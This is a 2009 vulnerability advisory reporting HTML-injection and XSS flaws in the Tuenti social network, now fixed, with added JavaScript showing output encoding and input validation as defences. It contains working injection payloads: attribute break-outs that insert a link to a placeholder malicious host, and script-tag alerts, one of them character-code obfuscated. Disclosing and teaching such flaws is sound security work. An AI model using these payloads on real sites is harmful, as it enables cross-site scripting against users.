Information Security

From: y3nh4ck3r_(at)_gmail.com <y3nh4ck3r_(at)_gmail.com>
Date: May 15, 2009
Subject: MULTIPLE CODE INJECTION VULNERABILITIES --TUENTI--SPAIN-->

####################
Language: English
####################

------------------------------------------------------------
MULTIPLE CODE INJECTION VULNERABILITIES --TUENTI--SPAIN-->
------------------------------------------------------------

SYSTEM INFORMATION:

-->WEB: http://www.tuenti.com/
-->DOWNLOAD: None.
-->DEMO: N/A
-->CATEGORY: Social Networking
-->DESCRIPTION: Tuenti is the biggest and most popular social network in Spain.

SYSTEM VULNERABILITY:

-->TESTED ON: Firefox 3 and Internet Explorer 6.0
-->CATEGORY: HTML CODE INJECTION / XSS
-->Discovered Bug date: 2009-05-04
-->Reported Bug date: 2009-05-04
-->Fixed bug date: 2009-05-12
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: To my girlfriend Marijose... brother, sister-in-law, parents (and friends xD) for their support.
-->EXTRA-COMMENT: Xikitiya, don't hate me for this hahaha


#################
/////////////////

HTML INJECTION:

/////////////////
#################


Go to --> http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos


Vuln GET var --> 'cat_id'


Note: An XSS attack was not possible here


------------------
PROOF OF CONCEPT:
------------------


http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos">
<A HREF=http://[MALICIOUS-HOST]/[PATH]/index.php>y3nh4ck3r was here!</A>


Return --> New link on footer


#############################
/////////////////////////////

CROSS SITE SCRIPTING (XSS):

/////////////////////////////
#############################


<<<<---------++++++++++++++ Condition: Be registered user +++++++++++++++++--------->>>>

<<<<---------++++++++++++++ Extra-Condition: Be friends (victim/attacker) +++++++++++++++++--------->>>>


Go to --> http://www.tuenti.com/#m=editfoto&upload=1&items=2-64699031-503405997-64699031



Vuln GET var --> 'items'


------------------
PROOF OF CONCEPT:
------------------


http://www.tuenti.com/#m=editfoto&upload=1&items=2-64699031-503405997-64699031"><script>alert('y3nh4ck3r was here')</script>


Return --> Alert message


<<<<---------++++++++++++++ Condition: Be registered user +++++++++++++++++--------->>>>

<<<<---------++++++++++++++ Extra-Condition: Nothing +++++++++++++++++--------->>>>


Go to --> http://www.tuenti.com/#m=videos&view=category&cat_id=upload


Vuln GET var --> 'cat_id'


------------------
PROOF OF CONCEPT:
------------------


http://www.tuenti.com/#m=videos&view=category&cat_id=upload"><script>alert(String.fromCharCode(121,51,110,104,52,99,107,51,114,32,119,97,115,32,104,101,114,101,33))</script>


Return --> Alert message


<<<<---------++++++++++++++ Condition: Nothing +++++++++++++++++--------->>>>

<<<<---------++++++++++++++ Extra-Condition: Nothing +++++++++++++++++--------->>>>


Go to --> http://www.tuenti.com/?need_invite=1


Vuln POST var --> 'email'


------------------
PROOF OF CONCEPT:
------------------


email="><script>alert(String.fromCharCode(121,51,110,104,52,99,107,51,114,32,119,97,115,32,104,101,114,101,33))</script>


Return --> Alert message


----------------
FINAL REMARK:
----------------


Staff members have successfully fixed these vulnerabilities ;)



#######################################################################
#######################################################################
##*******************************************************************##
##      SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray ...     ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##              GREETZ TO: SPANISH H4ck3Rs community!                ##
##*******************************************************************##
#######################################################################
#######################################################################
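
Every proof of concept in the advisory begins with `">`, which suggests the reflected value sat inside a double-quoted HTML attribute. The JavaScript below is an added example, not part of the original advisory and not Tuenti's code: it renders a fragment parameter by plain concatenation, then with output encoding, and checks it against an allowlist. The function names, the `social.example` host, the `<input>` template and the parameter formats are assumptions.

```javascript
// Added example: hypothetical names; the URL below is constructed, not a real endpoint.
const SAMPLE_URL = 'http://social.example/#m=videos&view=category&cat_id=upload"><script>alert(1)</script>';

// Split a URL fragment such as "#m=videos&cat_id=upload" into key/value pairs.
function parseFragment(url) {
  const at = url.indexOf('#');
  const params = Object.create(null);
  if (at === -1) return params;
  for (const pair of url.slice(at + 1).split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    const key = eq === -1 ? pair : pair.slice(0, eq);
    const raw = eq === -1 ? '' : pair.slice(eq + 1);
    try { params[key] = decodeURIComponent(raw); } catch (e) { params[key] = raw; }
  }
  return params;
}

// Encode the characters that can close an attribute or open a tag.
const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// Assumed formats, inferred from the benign URLs in the advisory:
// a short word for cat_id, dash-separated digits for items.
const ALLOWED = { cat_id: /^[A-Za-z0-9_]{1,32}$/, items: /^\d+(-\d+)*$/ };
function isValidParam(name, value) {
  const rule = Object.prototype.hasOwnProperty.call(ALLOWED, name) ? ALLOWED[name] : null;
  return rule !== null && typeof value === 'string' && rule.test(value);
}

// Before: the raw value is concatenated into a double-quoted attribute.
function renderUnsafe(catId) {
  return '<input type="hidden" name="cat_id" value="' + catId + '">';
}

// After: the same template with the value encoded on output.
function renderEscaped(catId) {
  return '<input type="hidden" name="cat_id" value="' + escapeHtml(catId) + '">';
}

const catId = parseFragment(SAMPLE_URL).cat_id;
console.log(renderUnsafe(catId));   // attribute is closed early and a script element follows
console.log(renderEscaped(catId));  // payload stays inside the value attribute as text
console.log(isValidParam('cat_id', catId), isValidParam('cat_id', 'upload'));
```

Validation and encoding are complementary: the allowlist rejects malformed input early, while encoding at the point of output protects any value that reaches the template.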
